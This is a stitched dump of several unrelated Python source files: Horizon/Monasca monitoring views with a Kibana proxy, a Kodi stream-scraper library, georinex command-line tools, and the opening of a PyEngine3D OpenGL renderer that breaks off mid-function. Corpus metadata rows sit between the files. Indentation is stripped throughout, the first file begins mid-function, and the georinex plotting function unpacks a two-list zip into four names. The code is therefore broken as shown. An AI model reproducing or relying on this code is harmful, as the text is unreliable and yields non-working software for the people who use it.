# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
non_project_keys = {'name', 'groupBy'}
try:
for group in settings.MONITORING_SERVICES:
key = list(group.keys())[0]
value = list(group.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.MONITORING_SERVICES
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
return value
return settings.MONITORING_SERVICES
except Exception:
LOG.warning("Failed to parse monitoring services by project, returning defaults.")
pass
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.MONITORING_SERVICES
def show_by_dimension(data, dim_name):
if 'metrics' in data:
dimensions = []
for metric in data['metrics']:
if 'dimensions' in metric:
if dim_name in metric['dimensions']:
dimension = metric['dimensions'][dim_name]
dimensions.append(dimension)
return dimensions
return []
def get_status(alarms):
if not alarms:
return 'chicklet-notfound'
status_index = 0
for a in alarms:
severity = alarm_tables.show_severity(a)
severity_index = index_by_severity.get(severity, None)
status_index = max(status_index, severity_index)
return priorities[status_index]['status']
def generate_status(request):
try:
alarms = api.monitor.alarm_list(request)
except Exception as e:
messages.error(request,
_('Unable to list alarms: %s') % str(e))
alarms = []
alarms_by_service = {}
for a in alarms:
service = alarm_tables.get_service(a)
service_alarms = alarms_by_service.setdefault(service, [])
service_alarms.append(a)
monitoring_services = copy.deepcopy(get_monitoring_services(request))
for row in monitoring_services:
row['name'] = str(row['name'])
if 'groupBy' in row:
alarms_by_group = {}
for a in alarms:
groups = show_by_dimension(a, row['groupBy'])
if groups:
for group in groups:
group_alarms = alarms_by_group.setdefault(group, [])
group_alarms.append(a)
services = []
for group, group_alarms in alarms_by_group.items():
name = '%s=%s' % (row['groupBy'], group)
# Encode as base64url to be able to include '/'
# encoding and decoding is required because of python3 compatibility
# urlsafe_b64encode requires byte-type text
name = 'b64:' + base64.urlsafe_b64encode(name.encode('utf-8')).decode('utf-8')
service = {
'display': group,
'name': name,
'class': get_status(group_alarms)
}
service['icon'] = get_icon(service['class'])
services.append(service)
row['services'] = services
else:
for service in row['services']:
service_alarms = alarms_by_service.get(service['name'], [])
service['class'] = get_status(service_alarms)
service['icon'] = get_icon(service['class'])
service['display'] = str(service['display'])
return monitoring_services
class IndexView(TemplateView):
template_name = constants.TEMPLATE_PREFIX + 'index.html'
def get_context_data(self, **kwargs):
if not policy.check((('monitoring', 'monitoring:monitoring'), ), self.request):
raise exceptions.NotAuthorized()
context = super(IndexView, self).get_context_data(**kwargs)
try:
region = self.request.user.services_region
context["grafana_url"] = getattr(settings, 'GRAFANA_URL').get(region, '')
except AttributeError:
# Catches case where Grafana 2 is not enabled.
proxy_url_path = str(reverse_lazy(constants.URL_PREFIX + 'proxy'))
api_root = self.request.build_absolute_uri(proxy_url_path)
context["api"] = api_root
context["dashboards"] = get_dashboard_links(self.request)
# Ensure all links have a 'raw' attribute
for link in context["dashboards"]:
link['raw'] = link.get('raw', False)
context['can_access_kibana'] = policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
context['enable_log_management_button'] = settings.ENABLE_LOG_MANAGEMENT_BUTTON
context['enable_event_management_button'] = settings.ENABLE_EVENT_MANAGEMENT_BUTTON
context['show_grafana_home'] = settings.SHOW_GRAFANA_HOME
return context
class MonascaProxyView(TemplateView):
template_name = ""
def _convert_dimensions(self, req_kwargs):
"""Converts the dimension string service:monitoring into a dict
This method converts the dimension string
service:monitoring (requested by a query string arg)
into a python dict that looks like
{"service": "monitoring"} (used by monasca api calls)
"""
dim_dict = {}
if 'dimensions' in req_kwargs:
dimensions_str = req_kwargs['dimensions'][0]
dimensions_str_array = dimensions_str.split(',')
for dimension in dimensions_str_array:
# limit splitting since value may contain a ':' such as in
# the `url` dimension of the service_status check.
dimension_name_value = dimension.split(':', 1)
if len(dimension_name_value) == 2:
name = dimension_name_value[0]
value = dimension_name_value[1]
dim_dict[name] = urllib.parse.unquote(value)
else:
raise Exception('Dimensions are malformed')
#
# If the request specifies 'INJECT_REGION' as the region, we'll
# replace with the horizon scoped region. We can't do this by
# default, since some implementations don't publish region as a
# dimension for all metrics (mini-mon for one).
#
if 'region' in dim_dict and dim_dict['region'] == 'INJECT_REGION':
dim_dict['region'] = self.request.user.services_region
req_kwargs['dimensions'] = dim_dict
return req_kwargs
def get(self, request, *args, **kwargs):
# monasca_endpoint = api.monitor.monasca_endpoint(self.request)
restpath = self.kwargs['restpath']
results = None
parts = restpath.split('/')
if "metrics" == parts[0]:
req_kwargs = dict(self.request.GET)
self._convert_dimensions(req_kwargs)
if len(parts) == 1:
results = {'elements': api.monitor.
metrics_list(request,
**req_kwargs)}
elif "statistics" == parts[1]:
results = {'elements': api.monitor.
metrics_stat_list(request,
**req_kwargs)}
elif "measurements" == parts[1]:
results = {'elements': api.monitor.
metrics_measurement_list(request,
**req_kwargs)}
elif "dimensions" == parts[1]:
results = {'elements': api.monitor.
metrics_dimension_value_list(request,
**req_kwargs)}
if not results:
LOG.warning("There was a request made for the path %s that"
" is not supported." % restpath)
results = {}
return HttpResponse(json.dumps(results),
content_type='application/json')
class StatusView(TemplateView):
template_name = ""
def get(self, request, *args, **kwargs):
ret = {
'series': generate_status(self.request),
'settings': {}
}
return HttpResponse(json.dumps(ret),
content_type='application/json')
class _HttpMethodRequest(urllib.request.Request):
def __init__(self, method, url, **kwargs):
urllib.request.Request.__init__(self, url, **kwargs)
self.method = method
def get_method(self):
return self.method
def proxy_stream_generator(response):
while True:
chunk = response.read(1000 * 1024)
if not chunk:
break
yield chunk
class KibanaProxyView(generic.View):
base_url = None
http_method_names = ['GET', 'POST', 'PUT', 'DELETE', 'HEAD']
def read(self, method, url, data, headers):
proxy_request_url = self.get_absolute_url(url)
proxy_request = _HttpMethodRequest(
method, proxy_request_url, data=data, headers=headers
)
try:
response = urllib.request.urlopen(proxy_request)
except urllib.error.HTTPError as e:
return http.HttpResponse(
e.read(),
status=e.code,
content_type=e.hdrs['content-type']
)
except urllib.error.URLError as e:
return http.HttpResponse(e.reason, 404)
else:
status = response.getcode()
proxy_response = http.StreamingHttpResponse(
proxy_stream_generator(response),
status=status,
content_type=response.headers['content-type']
)
if 'set-cookie' in response.headers:
proxy_response['set-cookie'] = response.headers['set-cookie']
return proxy_response
@csrf_exempt
def dispatch(self, request, url):
if not url:
url = '/'
if request.method not in self.http_method_names:
return http.HttpResponseNotAllowed(request.method)
if not self._can_access_kibana():
error_msg = (_('User %s does not have sufficient '
'privileges to access Kibana')
% auth_utils.get_user(request))
LOG.error(error_msg)
return http.HttpResponseForbidden(content=error_msg)
# passing kbn version explicitly for kibana >= 4.3.x
headers = {
"X-Auth-Token": request.user.token.id,
"kbn-version": request.META.get("HTTP_KBN_VERSION", ""),
"Cookie": request.META.get("HTTP_COOKIE", ""),
"Content-Type": "application/json",
}
return self.read(request.method, url, request.body, headers)
def get_relative_url(self, url):
url = urllib.parse.quote(url.encode('utf-8'))
params_str = self.request.GET.urlencode()
if params_str:
return '{0}?{1}'.format(url, params_str)
return url
def get_absolute_url(self, url):
return self.base_url + self.get_relative_url(url).lstrip('/')
def _can_access_kibana(self):
return policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
| apache-2.0 | 8,722,627,612,540,159,000 | 36.810502 | 100 | 0.577381 | false | 4.352431 | false | false | false |
huseyinbiyik/script.module.livelib | lib/livelib.py | 2 | 2019 | import boogietools as bt
import sys
import xbmcgui
class livelib():
def __init__(self):
self.timeout=None
def scrape(self,scraper,*args,**kwargs):
try:
module=__import__("scrapers",fromlist=[scraper])
scraper_function=getattr(module,scraper)
except Exception,e:
type="ERROR: LIVELIB | No scraper for %s"%scraper
result=e
return type,result
try:
type,result=scraper_function.run(*args,**kwargs)
except Exception,e:
type="ERROR: LIVELIB | Scraper \'%s\' can't scrape the service"%scraper
result=e
return type,result
header="*************** LIVELIB %s ARGUMENTS ***************"%type.upper()
print header
for k,v in result.iteritems():
print "%s:%s"%(k,str(v))
print "*"*len(header)
return type,result
def scrape_url(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
if "tcUrl" in params.keys():
url = self._escape_rtmp(params["tcUrl"])
params.pop("tcUrl")
if not self.timeout is None:
params["timeout"]=self.timeout
for k,v in params.iteritems():
if k=="conn":
for kc in sorted(v.keys()):
url+=" conn=%s"%self._escape_rtmp(v[kc])
continue
url+=" %s=%s"%(k,self._escape_rtmp(v))
return type,url
else:
return "ERROR: LIVELIB | Can't detect stream type %s"%type,""
if type in ["m3u","m3u8"]:
return type,params
def scrape_li(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
item = xbmcgui.ListItem(path=str(params["tcUrl"]))
params.pop("tcUrl")
for k,v in params.iteritems():
item.setProperty(str(k), str(v))
return type,item
else:
return "ERROR: LIVELIB | Can't convert stream type %s to ListItem"%type,None
def _escape_rtmp(self,s):
s=str(s)
escaped=[" ","?","&"]
for c in escaped:
if c in s:
s=s.replace(c,"\\%s"%hex(ord(c))[2:])
return s | gpl-2.0 | -2,178,086,190,224,053,200 | 26.297297 | 79 | 0.631005 | false | 2.847673 | false | false | false |
scienceopen/pyrinex | src/georinex/__main__.py | 1 | 8696 | import argparse
from pathlib import Path
import numpy as np
from datetime import timedelta
import logging
import georinex as gr
def georinex_read():
"""
Reads RINEX 2/3 OBS/NAV file and plot (or convert to NetCDF4 / HDF5).
Returns data as xarray.Dataset, think of it like an N-dimensional Numpy NDarray with lots of metadata and
very fancy indexing methods.
Xarray can be thought of as an analytically-tuned Pandas.
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# read RINEX files (NAV/OBS, Rinex 2 or 3, Hatanaka, etc.)
georinex_read ~/data/VEN100ITA_R_20181580000_01D_MN.rnx.gz
georinex_read ~/data/ABMF00GLP_R_20181330000_01D_30S_MO.zip
# read a limited range of time in a RINEX file
georinex_read ~/data/PUMO00CR__R_20180010000_01D_15S_MO.rnx -t 2018-01-01 2018-01-01T00:30
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("rinexfn", help="path to RINEX 2 or RINEX 3 file")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
help="do not use speculative preallocation (slow) let us know if this is needed",
action="store_false",
)
p.add_argument("-interval", help="read the rinex file only every N seconds", type=float)
P = p.parse_args()
data = gr.load(
P.rinexfn,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
interval=P.interval,
)
# %% plots
if P.plot:
import georinex.plots as grp
from matplotlib.pyplot import show
grp.timeseries(data)
show()
else:
print(data)
def georinex_plot():
"""
PyRINEX plotting example
includes how to index by satellite, measurement type and time
"""
import matplotlib.dates as md
from matplotlib.pyplot import figure, show
p = argparse.ArgumentParser(description="Plot raw Rinex data")
p.add_argument("rinexfn", help="RINEX file to analyze")
p.add_argument("sv", help="SVs to analyze e.g. G14 C12", nargs="+")
p.add_argument(
"-t",
"--tlim",
help="time limits (start stop) e.g. 2017-05-25T12:47 2017-05-25T13:05",
nargs=2,
)
p.add_argument(
"-w", "--what", help="what measurements to plot e.g. L1C", nargs="+", default=["L1C", "P1"]
)
P = p.parse_args()
rinexfn = Path(P.rinexfn).expanduser()
obs = gr.load(rinexfn, use="G")
# %% optional time indexing demo
# can use datetime or string
# boolean indexing -- set "i=slice(None)" to disable time indexing.
if P.tlim is not None:
i = (obs.time >= np.datetime64(P.tlim[0])) & (obs.time <= np.datetime64(P.tlim[1]))
else:
i = slice(None)
# %% plot
SV = P.sv
what = P.what
# FIXME: make these title automatic based on requested measurement?
# titles = ['Psedoranges of GPS and Glonass', 'Carrier Phase', 'Doppler', 'Signal Strength']
# ylabels = ['Pseudoranges', 'Phase', 'Doppler', 'signal strength']
fg = figure(figsize=(9, 9))
axs = fg.subplots(4, 1, sharex=True)
for v, title, ylabel, ax in zip(what, axs):
if v not in obs:
continue
Satobs = obs[v][i].sel(sv=SV).dropna(dim="time", how="all")
Satobs.plot(ax=ax)
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.legend(loc="center left", bbox_to_anchor=(1, 0.5))
axs[-1].set_xlabel("Time [UTC]")
axs[-1].xaxis.set_major_formatter(md.DateFormatter("%Y-%m-%dT%H:%M"))
fg.suptitle(f"{rinexfn.name} satellite {SV}")
show()
def rinex2hdf5():
"""
Converts RINEX 2/3 NAV/OBS to NetCDF4 / HDF5
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# batch convert RINEX OBS2 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*o"
rnx2hdf5.py ~/data "*o.Z"
rnx2hdf5.py ~/data "*o.zip"
# batch convert RINEX OBS3 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*MO.rnx"
rnx2hdf5.py ~/data "*MO.rnx.gz"
# batch convert compressed Hatanaka RINEX files to NetCDF4 / HDF5
rnx2hdf5.py ~/data "*.crx.gz"
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files to convert")
p.add_argument("glob", help="file glob pattern", nargs="?", default="*")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
help="do not use speculative preallocation (slow) let us know if this is needed",
action="store_false",
)
P = p.parse_args()
gr.batch_convert(
P.indir,
P.glob,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
)
def georinex_time():
p = argparse.ArgumentParser()
p.add_argument("filename", help="RINEX filename to get times from")
p.add_argument("-glob", help="file glob pattern", nargs="+", default="*")
p.add_argument("-v", "--verbose", action="store_true")
p = p.parse_args()
filename = Path(p.filename).expanduser()
print("filename: start, stop, number of times, interval")
if filename.is_dir():
flist = gr.globber(filename, p.glob)
for f in flist:
eachfile(f, p.verbose)
elif filename.is_file():
eachfile(filename, p.verbose)
else:
raise FileNotFoundError(f"{filename} is not a path or file")
def eachfile(fn: Path, verbose: bool = False):
try:
times = gr.gettime(fn)
except ValueError as e:
if verbose:
print(f"{fn.name}: {e}")
return
# %% output
Ntimes = times.size
if Ntimes == 0:
return
ostr = f"{fn.name}:" f" {times[0].isoformat()}" f" {times[-1].isoformat()}" f" {Ntimes}"
hdr = gr.rinexheader(fn)
interval = hdr.get("interval", np.nan)
if ~np.isnan(interval):
ostr += f" {interval}"
Nexpect = (times[-1] - times[0]) // timedelta(seconds=interval) + 1
if Nexpect != Ntimes:
logging.warning(f"{fn.name}: expected {Nexpect} but got {Ntimes} times")
print(ostr)
if verbose:
print(times)
def georinex_loc():
"""
Visualize location of all receivers on map,
where color & size are proportional to measurement interval (smaller is better)
"""
from matplotlib.pyplot import show
import georinex.plots_geo as grp
import georinex.geo as gg
p = argparse.ArgumentParser(description="plot receiver locations")
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files")
p.add_argument(
"-glob",
help="file glob pattern",
nargs="+",
default=["*o", "*O.rnx", "*O.rnx.gz", "*O.crx", "*O.crx.gz"],
)
p = p.parse_args()
indir = Path(p.indir).expanduser()
flist = gr.globber(indir, p.glob)
locs = gg.get_locations(flist)
grp.receiver_locations(locs)
show()
| mit | 2,579,951,635,595,863,600 | 29.512281 | 109 | 0.604991 | false | 3.238734 | false | false | false |
ubuntunux/PyEngine3D | PyEngine3D/Render/Renderer.py | 1 | 60697 | from ctypes import c_void_p
import math
import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
from PyEngine3D.Common import logger, COMMAND
from PyEngine3D.Common.Constants import *
from PyEngine3D.Utilities import *
from PyEngine3D.OpenGLContext import InstanceBuffer, FrameBufferManager, RenderBuffer, UniformBlock, CreateTexture
from .PostProcess import AntiAliasing, PostProcess
from . import RenderTargets, RenderOption, RenderingType, RenderGroup, RenderMode
from . import SkeletonActor, StaticActor, ScreenQuad, Line
from . import Spline3D
class Renderer(Singleton):
def __init__(self):
self.initialized = False
self.view_mode = GL_FILL
# managers
self.core_manager = None
self.viewport_manager = None
self.resource_manager = None
self.font_manager = None
self.scene_manager = None
self.debug_line_manager = None
self.render_option_manager = None
self.rendertarget_manager = None
self.framebuffer_manager = None
self.postprocess = None
# components
self.viewport = None
self.debug_texture = None
self.blend_enable = False
self.blend_equation = GL_FUNC_ADD
self.blend_func_src = GL_SRC_ALPHA
self.blend_func_dst = GL_ONE_MINUS_SRC_ALPHA
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
# scene constants uniform buffer
self.uniform_scene_buffer = None
self.uniform_scene_data = None
self.uniform_view_buffer = None
self.uniform_view_data = None
self.uniform_view_projection_buffer = None
self.uniform_view_projection_data = None
self.uniform_light_buffer = None
self.uniform_light_data = None
self.uniform_point_light_buffer = None
self.uniform_point_light_data = None
self.uniform_particle_common_buffer = None
self.uniform_particle_common_data = None
self.uniform_particle_infos_buffer = None
self.uniform_particle_infos_data = None
# material instances
self.scene_constants_material = None
self.debug_bone_material = None
self.shadowmap_material = None
self.shadowmap_skeletal_material = None
self.static_object_id_material = None
self.skeletal_object_id_material = None
self.selcted_static_object_material = None
self.selcted_skeletal_object_material = None
self.selcted_object_composite_material = None
self.render_color_material = None
self.render_heightmap_material = None
# font
self.font_instance_buffer = None
self.font_shader = None
self.actor_instance_buffer = None
self.render_custom_translucent_callbacks = []
def initialize(self, core_manager):
logger.info("Initialize Renderer")
self.core_manager = core_manager
self.viewport_manager = core_manager.viewport_manager
self.viewport = self.viewport_manager.main_viewport
self.resource_manager = core_manager.resource_manager
self.render_option_manager = core_manager.render_option_manager
self.font_manager = core_manager.font_manager
self.scene_manager = core_manager.scene_manager
self.debug_line_manager = core_manager.debug_line_manager
self.rendertarget_manager = core_manager.rendertarget_manager
self.postprocess = PostProcess()
self.postprocess.initialize()
self.framebuffer_manager = FrameBufferManager.instance()
# material instances
self.scene_constants_material = self.resource_manager.get_material_instance('scene_constants_main')
self.debug_bone_material = self.resource_manager.get_material_instance("debug_bone")
self.shadowmap_material = self.resource_manager.get_material_instance("shadowmap")
self.shadowmap_skeletal_material = self.resource_manager.get_material_instance(name="shadowmap_skeletal",
shader_name="shadowmap",
macros={"SKELETAL": 1})
self.static_object_id_material = self.resource_manager.get_material_instance(name="render_static_object_id",
shader_name="render_object_id")
self.skeletal_object_id_material = self.resource_manager.get_material_instance(name="render_skeletal_object_id",
shader_name="render_object_id",
macros={"SKELETAL": 1})
self.selcted_static_object_material = self.resource_manager.get_material_instance("selected_object")
self.selcted_skeletal_object_material = self.resource_manager.get_material_instance(name="selected_object_skeletal",
shader_name="selected_object",
macros={"SKELETAL": 1})
self.selcted_object_composite_material = self.resource_manager.get_material_instance("selected_object_composite")
self.render_color_material = self.resource_manager.get_material_instance(name="render_object_color", shader_name="render_object_color")
self.render_heightmap_material = self.resource_manager.get_material_instance(name="render_heightmap", shader_name="render_heightmap")
# font
self.font_shader = self.resource_manager.get_material_instance("font")
self.font_instance_buffer = InstanceBuffer(name="font_offset", location_offset=1, element_datas=[FLOAT4_ZERO, ])
# instance buffer
self.actor_instance_buffer = InstanceBuffer(name="actor_instance_buffer", location_offset=7, element_datas=[MATRIX4_IDENTITY, ])
# scene constants uniform buffer
program = self.scene_constants_material.get_program()
self.uniform_scene_data = np.zeros(1, dtype=[('TIME', np.float32),
('JITTER_FRAME', np.float32),
('RENDER_SSR', np.int32),
('RENDER_SSAO', np.int32),
('SCREEN_SIZE', np.float32, 2),
('BACKBUFFER_SIZE', np.float32, 2),
('MOUSE_POS', np.float32, 2),
('DELTA_TIME', np.float32),
('SCENE_DUMMY_0', np.int32)])
self.uniform_scene_buffer = UniformBlock("scene_constants", program, 0, self.uniform_scene_data)
self.uniform_view_data = np.zeros(1, dtype=[('VIEW', np.float32, (4, 4)),
('INV_VIEW', np.float32, (4, 4)),
('VIEW_ORIGIN', np.float32, (4, 4)),
('INV_VIEW_ORIGIN', np.float32, (4, 4)),
('PROJECTION', np.float32, (4, 4)),
('INV_PROJECTION', np.float32, (4, 4)),
('CAMERA_POSITION', np.float32, 3),
('VIEW_DUMMY_0', np.float32),
('NEAR_FAR', np.float32, 2),
('JITTER_DELTA', np.float32, 2),
('JITTER_OFFSET', np.float32, 2),
('VIEWCONSTANTS_DUMMY0', np.float32, 2)])
self.uniform_view_buffer = UniformBlock("view_constants", program, 1, self.uniform_view_data)
self.uniform_view_projection_data = np.zeros(1, dtype=[('VIEW_PROJECTION', np.float32, (4, 4)),
('PREV_VIEW_PROJECTION', np.float32, (4, 4))])
self.uniform_view_projection_buffer = UniformBlock("view_projection", program, 2,
self.uniform_view_projection_data)
self.uniform_light_data = np.zeros(1, dtype=[('SHADOW_MATRIX', np.float32, (4, 4)),
('LIGHT_POSITION', np.float32, 3),
('SHADOW_EXP', np.float32),
('LIGHT_DIRECTION', np.float32, 3),
('SHADOW_BIAS', np.float32),
('LIGHT_COLOR', np.float32, 3),
('SHADOW_SAMPLES', np.int32)])
self.uniform_light_buffer = UniformBlock("light_constants", program, 3, self.uniform_light_data)
self.uniform_point_light_data = np.zeros(MAX_POINT_LIGHTS, dtype=[('color', np.float32, 3),
('radius', np.float32),
('pos', np.float32, 3),
('render', np.float32)])
self.uniform_point_light_buffer = UniformBlock("point_light_constants", program, 4, self.uniform_point_light_data)
self.uniform_particle_common_data = np.zeros(1, dtype=[
('PARTICLE_COLOR', np.float32, 3),
('PARTICLE_ALIGN_MODE', np.int32),
('PARTICLE_CELL_COUNT', np.int32, 2),
('PARTICLE_BLEND_MODE', np.int32),
('PARTICLE_COMMON_DUMMY_0', np.int32)
])
self.uniform_particle_common_buffer = UniformBlock("particle_common", program, 5, self.uniform_particle_common_data)
self.uniform_particle_infos_data = np.zeros(1, dtype=[
('PARTICLE_PARENT_MATRIX', np.float32, (4, 4)),
('PARTICLE_DELAY', np.float32, 2),
('PARTICLE_LIFE_TIME', np.float32, 2),
('PARTICLE_TRANSFORM_ROTATION_MIN', np.float32, 3),
('PARTICLE_FADE_IN', np.float32),
('PARTICLE_TRANSFORM_ROTATION_MAX', np.float32, 3),
('PARTICLE_FADE_OUT', np.float32),
('PARTICLE_TRANSFORM_SCALE_MIN', np.float32, 3),
('PARTICLE_OPACITY', np.float32),
('PARTICLE_TRANSFORM_SCALE_MAX', np.float32, 3),
('PARTICLE_ENABLE_VECTOR_FIELD', np.int32),
('PARTICLE_VELOCITY_POSITION_MIN', np.float32, 3),
('PARTICLE_VECTOR_FIELD_STRENGTH', np.float32),
('PARTICLE_VELOCITY_POSITION_MAX', np.float32, 3),
('PARTICLE_VECTOR_FIELD_TIGHTNESS', np.float32),
('PARTICLE_VELOCITY_ROTATION_MIN', np.float32, 3),
('PARTICLE_MAX_COUNT', np.uint32),
('PARTICLE_VELOCITY_ROTATION_MAX', np.float32, 3),
('PARTICLE_SPAWN_COUNT', np.uint32),
('PARTICLE_VELOCITY_SCALE_MIN', np.float32, 3),
('PARTICLE_VELOCITY_STRETCH', np.float32),
('PARTICLE_VELOCITY_SCALE_MAX', np.float32, 3),
('PARTICLE_VELOCITY_ACCELERATION', np.float32),
('PARTICLE_VECTOR_FIELD_MATRIX', np.float32, (4, 4)),
('PARTICLE_VECTOR_FIELD_INV_MATRIX', np.float32, (4, 4)),
('PARTICLE_SPAWN_VOLUME_INFO', np.float32, 3),
('PARTICLE_SPAWN_VOLUME_TYPE', np.uint32),
('PARTICLE_SPAWN_VOLUME_MATRIX', np.float32, (4, 4)),
('PARTICLE_VELOCITY_LIMIT', np.float32, 2),
('PARTICLE_FORCE_GRAVITY', np.float32),
('PARTICLE_PLAY_SPEED', np.float32),
('PARTICLE_VELOCITY_TYPE', np.uint32),
('PARTICLE_FORCE_ELASTICITY', np.float32),
('PARTICLE_FORCE_FRICTION', np.float32),
('PARTICLE_DUMMY_0', np.uint32),
])
self.uniform_particle_infos_buffer = UniformBlock("particle_infos", program, 6, self.uniform_particle_infos_data)
def get_rendering_type_name(rendering_type):
rendering_type = str(rendering_type)
return rendering_type.split('.')[-1] if '.' in rendering_type else rendering_type
rendering_type_list = [get_rendering_type_name(RenderingType.convert_index_to_enum(x)) for x in range(RenderingType.COUNT.value)]
self.initialized = True
# Send to GUI
self.core_manager.send_rendering_type_list(rendering_type_list)
def close(self):
pass
def render_custom_translucent(self, render_custom_translucent_callback):
self.render_custom_translucent_callbacks.append(render_custom_translucent_callback)
def set_blend_state(self, blend_enable=True, equation=GL_FUNC_ADD, func_src=GL_SRC_ALPHA, func_dst=GL_ONE_MINUS_SRC_ALPHA):
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
self.blend_enable = blend_enable
if blend_enable:
self.blend_equation = equation
self.blend_func_src = func_src
self.blend_func_dst = func_dst
glEnable(GL_BLEND)
glBlendEquation(equation)
glBlendFunc(func_src, func_dst)
else:
glDisable(GL_BLEND)
def restore_blend_state_prev(self):
self.set_blend_state(self.blend_enable_prev,
self.blend_equation_prev,
self.blend_func_src_prev,
self.blend_func_dst_prev)
def set_view_mode(self, view_mode):
if view_mode == COMMAND.VIEWMODE_WIREFRAME:
self.view_mode = GL_LINE
elif view_mode == COMMAND.VIEWMODE_SHADING:
self.view_mode = GL_FILL
def reset_renderer(self):
self.scene_manager.update_camera_projection_matrix(aspect=self.core_manager.game_backend.aspect)
self.framebuffer_manager.clear_framebuffer()
self.rendertarget_manager.create_rendertargets()
self.scene_manager.reset_light_probe()
self.core_manager.gc_collect()
def ortho_view(self, look_at=True):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, self.viewport.width, 0, self.viewport.height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def perspective_view(self, look_at=True):
camera = self.scene_manager.main_camera
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(camera.fov, camera.aspect, camera.near, camera.far)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def look_at(self):
camera = self.scene_manager.main_camera
camera_target = -camera.transform.front
camera_up = camera.transform.up
glScalef(*(1.0 / camera.transform.get_scale()))
gluLookAt(0.0, 0.0, 0.0, *camera_target, *camera_up)
glTranslatef(*(-camera.transform.get_pos()))
def set_debug_texture(self, texture):
if texture is not None and texture is not RenderTargets.BACKBUFFER and type(texture) != RenderBuffer:
self.debug_texture = texture
self.postprocess.is_render_material_instance = False
logger.info("Current texture : %s" % self.debug_texture.name)
else:
self.debug_texture = None
def bind_uniform_blocks(self):
camera = self.scene_manager.main_camera
main_light = self.scene_manager.main_light
if not camera or not main_light:
return
frame_count = self.core_manager.frame_count % 16
uniform_data = self.uniform_scene_data
uniform_data['TIME'] = self.core_manager.current_time
uniform_data['JITTER_FRAME'] = frame_count
uniform_data['RENDER_SSR'] = self.postprocess.is_render_ssr
uniform_data['RENDER_SSAO'] = self.postprocess.is_render_ssao
uniform_data['SCREEN_SIZE'] = (self.core_manager.game_backend.width, self.core_manager.game_backend.height)
uniform_data['BACKBUFFER_SIZE'] = (RenderTargets.BACKBUFFER.width, RenderTargets.BACKBUFFER.height)
uniform_data['MOUSE_POS'] = self.core_manager.get_mouse_pos()
uniform_data['DELTA_TIME'] = self.core_manager.delta
self.uniform_scene_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_view_data
uniform_data['VIEW'][...] = camera.view
uniform_data['INV_VIEW'][...] = camera.inv_view
uniform_data['VIEW_ORIGIN'][...] = camera.view_origin
uniform_data['INV_VIEW_ORIGIN'][...] = camera.inv_view_origin
uniform_data['PROJECTION'][...] = camera.projection_jitter
uniform_data['INV_PROJECTION'][...] = camera.inv_projection_jitter
uniform_data['CAMERA_POSITION'][...] = camera.transform.get_pos()
